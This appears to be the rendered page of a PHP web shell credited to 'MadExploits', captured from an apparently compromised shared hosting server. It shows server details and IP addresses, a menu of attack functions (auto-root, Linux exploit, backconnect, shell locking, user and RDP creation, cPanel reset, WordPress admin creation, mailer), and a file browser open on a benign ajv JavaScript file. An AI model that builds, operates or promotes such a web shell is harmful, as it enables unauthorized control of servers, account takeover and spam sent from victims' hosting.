Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.188.59.18
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
node_modules /
har-validator /
node_modules /
ajv /
lib /
compile /
[ HOME SHELL ]
Name
Size
Permission
Action
async.js
2.58
KB
-rw-r--r--
equal.js
176
B
-rw-r--r--
error_classes.js
828
B
-rw-r--r--
formats.js
11.8
KB
-rw-r--r--
index.js
10.44
KB
-rw-r--r--
resolve.js
7.66
KB
-rw-r--r--
rules.js
1.97
KB
-rw-r--r--
schema_obj.js
133
B
-rw-r--r--
ucs2length.js
558
B
-rw-r--r--
util.js
6.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ucs2length.js
'use strict'; // https://mathiasbynens.be/notes/javascript-encoding // https://github.com/bestiejs/punycode.js - punycode.ucs2.decode module.exports = function ucs2length(str) { var length = 0 , len = str.length , pos = 0 , value; while (pos < len) { length++; value = str.charCodeAt(pos++); if (value >= 0xD800 && value <= 0xDBFF && pos < len) { // high surrogate, and there is a next character value = str.charCodeAt(pos); if ((value & 0xFC00) == 0xDC00) pos++; // low surrogate } } return length; };
Close